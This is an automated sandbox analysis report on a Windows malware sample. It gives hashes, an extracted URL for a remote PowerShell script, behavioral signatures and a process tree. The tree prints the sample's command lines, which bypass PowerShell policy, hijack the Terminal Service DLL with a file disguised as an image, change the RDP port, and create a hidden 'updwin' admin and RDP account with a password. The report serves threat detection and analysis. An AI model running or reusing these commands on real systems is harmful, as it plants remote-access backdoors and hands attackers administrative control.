Analysis
- max time kernel: 37s
- max time network: 112s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 06-11-2020 11:45
Static task: static1
Behavioral task: behavioral1
  Sample: 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
  Resource: win10v20201028
General
- Target: 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
- Size: 3.4MB
- MD5: cb15ff552cc7a8f69df60d2d68c8c54d
- SHA1: e9780d261ca4b8fbe3a2ca0cfaa587c6c642a8c8
- SHA256: 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a
- SHA512: d9689e28c8558390f76119fb6a1449b48e0bcae5fae49a495c8cd3f9accc0eedd9d8a9d853977faee45ac82fcfbaa76e183876ca11841fa659bbe4dd625bacba
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
flow | pid | process
20 | 2604 | powershell.exe
22 | 2604 | powershell.exe
23 | 2604 | powershell.exe
24 | 2604 | powershell.exe
26 | 2604 | powershell.exe
28 | 2604 | powershell.exe
30 | 2604 | powershell.exe
32 | 2604 | powershell.exe
34 | 2604 | powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
-
Deletes itself 1 IoCs
Processes:
pid | process
3092 | powershell.exe
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
1636 | 1636
-
Modifies service 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
-
Drops file in Windows directory 19 IoCs
Processes:
description | ioc | process
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4vlmj0u5.1nr.psm1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC05B.tmp | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tjm0j40u.tgx.ps1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC03A.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC03B.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC06B.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC019.tmp | powershell.exe
-
Modifies data under HKEY_USERS 217 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" | powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 24 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 26 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 22 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 23 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
pid | process
3092 | powershell.exe
3092 | powershell.exe
3092 | powershell.exe
3092 | powershell.exe
3092 | powershell.exe
3092 | powershell.exe
2604 | powershell.exe
2604 | powershell.exe
2604 | powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
616 | 616
-
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3092 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3092 | powershell.exe
Token: SeSecurityPrivilege | 3092 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3092 | powershell.exe
Token: SeLoadDriverPrivilege | 3092 | powershell.exe
Token: SeSystemProfilePrivilege | 3092 | powershell.exe
Token: SeSystemtimePrivilege | 3092 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3092 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3092 | powershell.exe
Token: SeCreatePagefilePrivilege | 3092 | powershell.exe
Token: SeBackupPrivilege | 3092 | powershell.exe
Token: SeRestorePrivilege | 3092 | powershell.exe
Token: SeShutdownPrivilege | 3092 | powershell.exe
Token: SeDebugPrivilege | 3092 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3092 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3092 | powershell.exe
Token: SeUndockPrivilege | 3092 | powershell.exe
Token: SeManageVolumePrivilege | 3092 | powershell.exe
Token: 33 | 3092 | powershell.exe
Token: 34 | 3092 | powershell.exe
Token: 35 | 3092 | powershell.exe
Token: 36 | 3092 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3092 | powershell.exe
Token: SeSecurityPrivilege | 3092 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3092 | powershell.exe
Token: SeLoadDriverPrivilege | 3092 | powershell.exe
Token: SeSystemProfilePrivilege | 3092 | powershell.exe
Token: SeSystemtimePrivilege | 3092 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3092 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3092 | powershell.exe
Token: SeCreatePagefilePrivilege | 3092 | powershell.exe
Token: SeBackupPrivilege | 3092 | powershell.exe
Token: SeRestorePrivilege | 3092 | powershell.exe
Token: SeShutdownPrivilege | 3092 | powershell.exe
Token: SeDebugPrivilege | 3092 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3092 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3092 | powershell.exe
Token: SeUndockPrivilege | 3092 | powershell.exe
Token: SeManageVolumePrivilege | 3092 | powershell.exe
Token: 33 | 3092 | powershell.exe
Token: 34 | 3092 | powershell.exe
Token: 35 | 3092 | powershell.exe
Token: 36 | 3092 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3092 | powershell.exe
Token: SeSecurityPrivilege | 3092 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3092 | powershell.exe
Token: SeLoadDriverPrivilege | 3092 | powershell.exe
Token: SeSystemProfilePrivilege | 3092 | powershell.exe
Token: SeSystemtimePrivilege | 3092 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3092 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3092 | powershell.exe
Token: SeCreatePagefilePrivilege | 3092 | powershell.exe
Token: SeBackupPrivilege | 3092 | powershell.exe
Token: SeRestorePrivilege | 3092 | powershell.exe
Token: SeShutdownPrivilege | 3092 | powershell.exe
Token: SeDebugPrivilege | 3092 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3092 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3092 | powershell.exe
Token: SeUndockPrivilege | 3092 | powershell.exe
Token: SeManageVolumePrivilege | 3092 | powershell.exe
Token: 33 | 3092 | powershell.exe
Token: 34 | 3092 | powershell.exe
Token: 35 | 3092 | powershell.exe
Token: 36 | 3092 | powershell.exe
-
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
description | pid | process | target process
PID 4636 wrote to memory of 3092 | 4636 | 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe | powershell.exe
PID 4636 wrote to memory of 3092 | 4636 | 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe | powershell.exe
PID 3092 wrote to memory of 1764 | 3092 | powershell.exe | csc.exe
PID 3092 wrote to memory of 1764 | 3092 | powershell.exe | csc.exe
PID 1764 wrote to memory of 4288 | 1764 | csc.exe | cvtres.exe
PID 1764 wrote to memory of 4288 | 1764 | csc.exe | cvtres.exe
PID 3092 wrote to memory of 4416 | 3092 | powershell.exe | reg.exe
PID 3092 wrote to memory of 4416 | 3092 | powershell.exe | reg.exe
PID 3092 wrote to memory of 4400 | 3092 | powershell.exe | reg.exe
PID 3092 wrote to memory of 4400 | 3092 | powershell.exe | reg.exe
PID 3092 wrote to memory of 500 | 3092 | powershell.exe | reg.exe
PID 3092 wrote to memory of 500 | 3092 | powershell.exe | reg.exe
PID 3092 wrote to memory of 648 | 3092 | powershell.exe | net.exe
PID 3092 wrote to memory of 648 | 3092 | powershell.exe | net.exe
PID 648 wrote to memory of 904 | 648 | net.exe | net1.exe
PID 648 wrote to memory of 904 | 648 | net.exe | net1.exe
PID 3092 wrote to memory of 364 | 3092 | powershell.exe | cmd.exe
PID 3092 wrote to memory of 364 | 3092 | powershell.exe | cmd.exe
PID 364 wrote to memory of 812 | 364 | cmd.exe | cmd.exe
PID 364 wrote to memory of 812 | 364 | cmd.exe | cmd.exe
PID 812 wrote to memory of 1056 | 812 | cmd.exe | net.exe
PID 812 wrote to memory of 1056 | 812 | cmd.exe | net.exe
PID 1056 wrote to memory of 1216 | 1056 | net.exe | net1.exe
PID 1056 wrote to memory of 1216 | 1056 | net.exe | net1.exe
PID 3092 wrote to memory of 1404 | 3092 | powershell.exe | cmd.exe
PID 3092 wrote to memory of 1404 | 3092 | powershell.exe | cmd.exe
PID 1404 wrote to memory of 1412 | 1404 | cmd.exe | cmd.exe
PID 1404 wrote to memory of 1412 | 1404 | cmd.exe | cmd.exe
PID 1412 wrote to memory of 1492 | 1412 | cmd.exe | net.exe
PID 1412 wrote to memory of 1492 | 1412 | cmd.exe | net.exe
PID 1492 wrote to memory of 1584 | 1492 | net.exe | net1.exe
PID 1492 wrote to memory of 1584 | 1492 | net.exe | net1.exe
PID 1960 wrote to memory of 2240 | 1960 | cmd.exe | net.exe
PID 1960 wrote to memory of 2240 | 1960 | cmd.exe | net.exe
PID 2240 wrote to memory of 2376 | 2240 | net.exe | net1.exe
PID 2240 wrote to memory of 2376 | 2240 | net.exe | net1.exe
PID 2484 wrote to memory of 2536 | 2484 | cmd.exe | net.exe
PID 2484 wrote to memory of 2536 | 2484 | cmd.exe | net.exe
PID 2536 wrote to memory of 2608 | 2536 | net.exe | net1.exe
PID 2536 wrote to memory of 2608 | 2536 | net.exe | net1.exe
PID 3116 wrote to memory of 4600 | 3116 | cmd.exe | net.exe
PID 3116 wrote to memory of 4600 | 3116 | cmd.exe | net.exe
PID 4600 wrote to memory of 2628 | 4600 | net.exe | net1.exe
PID 4600 wrote to memory of 2628 | 4600 | net.exe | net1.exe
PID 4620 wrote to memory of 184 | 4620 | cmd.exe | net.exe
PID 4620 wrote to memory of 184 | 4620 | cmd.exe | net.exe
PID 184 wrote to memory of 4532 | 184 | net.exe | net1.exe
PID 184 wrote to memory of 4532 | 184 | net.exe | net1.exe
PID 2872 wrote to memory of 1332 | 2872 | cmd.exe | net.exe
PID 2872 wrote to memory of 1332 | 2872 | cmd.exe | net.exe
PID 1332 wrote to memory of 4632 | 1332 | net.exe | net1.exe
PID 1332 wrote to memory of 4632 | 1332 | net.exe | net1.exe
PID 4468 wrote to memory of 2572 | 4468 | cmd.exe | net.exe
PID 4468 wrote to memory of 2572 | 4468 | cmd.exe | net.exe
PID 2572 wrote to memory of 1316 | 2572 | net.exe | net1.exe
PID 2572 wrote to memory of 1316 | 2572 | net.exe | net1.exe
PID 2560 wrote to memory of 4496 | 2560 | cmd.exe | WMIC.exe
PID 2560 wrote to memory of 4496 | 2560 | cmd.exe | WMIC.exe
PID 4932 wrote to memory of 4056 | 4932 | cmd.exe | WMIC.exe
PID 4932 wrote to memory of 4056 | 4932 | cmd.exe | WMIC.exe
PID 1532 wrote to memory of 688 | 1532 | cmd.exe | cmd.exe
PID 1532 wrote to memory of 688 | 1532 | cmd.exe | cmd.exe
PID 688 wrote to memory of 2604 | 688 | cmd.exe | powershell.exe
PID 688 wrote to memory of 2604 | 688 | cmd.exe | powershell.exe
Processes
-
Process (depth 1): C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe"
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    - Deletes itself
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.cmdline"
      - Suspicious use of WriteProcessMemory
-
      Process (depth 4): C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5190.tmp" "c:\Users\Admin\AppData\Local\Temp\z2mm4oij\CSC275C1D5BBB7C49098089648E4E3A7A1A.TMP"
-
    Process (depth 3): C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
-
    Process (depth 3): C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies service
      - Modifies registry key
-
    Process (depth 3): C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
-
    Process (depth 3): C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
-
      Process (depth 4): C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
-
    Process (depth 3): C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
-
      Process (depth 4): C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
-
        Process (depth 5): C:\Windows\system32\net.exe
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
-
          Process (depth 6): C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
-
    Process (depth 3): C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
-
      Process (depth 4): C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
-
        Process (depth 5): C:\Windows\system32\net.exe
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
-
          Process (depth 6): C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
-
    Process (depth 3): C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
-
    Process (depth 3): C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin Ghasar4f5 /del
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\system32\net.exe
    Command line: net.exe user updwin Ghasar4f5 /del
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin L6kbkYfK /add
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\system32\net.exe
    Command line: net.exe user updwin L6kbkYfK /add
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin L6kbkYfK /add
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" updwin /ADD
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin L6kbkYfK
  - Suspicious use of WriteProcessMemory
